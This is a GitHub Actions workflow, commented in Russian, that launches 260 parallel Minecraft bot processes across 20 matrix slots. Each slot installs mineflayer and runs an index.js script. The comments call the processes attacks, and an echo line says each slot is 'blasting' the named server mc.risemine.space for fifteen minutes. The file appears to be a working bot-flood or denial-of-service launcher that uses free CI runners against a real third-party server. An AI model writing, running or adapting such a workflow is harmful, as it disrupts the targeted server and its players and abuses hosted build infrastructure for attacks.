name: 1aelsedie-Alpine-18-Strike
on: 
  workflow_dispatch:

jobs:
  strike:
    # Оставляем ubuntu-latest, потому что это "железо" Гитхаба
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        slot: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    
    # А вот тут мы говорим Гитхабу использовать образ Alpine с Node 18
    container: node:18-alpine

    steps:
      - name: Checkout Code
        uses: actions/checkout@v4

      - name: Massive Alpine Launch
        run: |
          npm install mineflayer --quiet
          # Запускаем по 13 процессов на каждый слот (итого 260 параллельных атак)
          for i in {1..13}; do
            node index.js &
          done
          echo "Slot ${{ matrix.slot }} is blasting mc.risemine.space on Alpine!"
          sleep 900
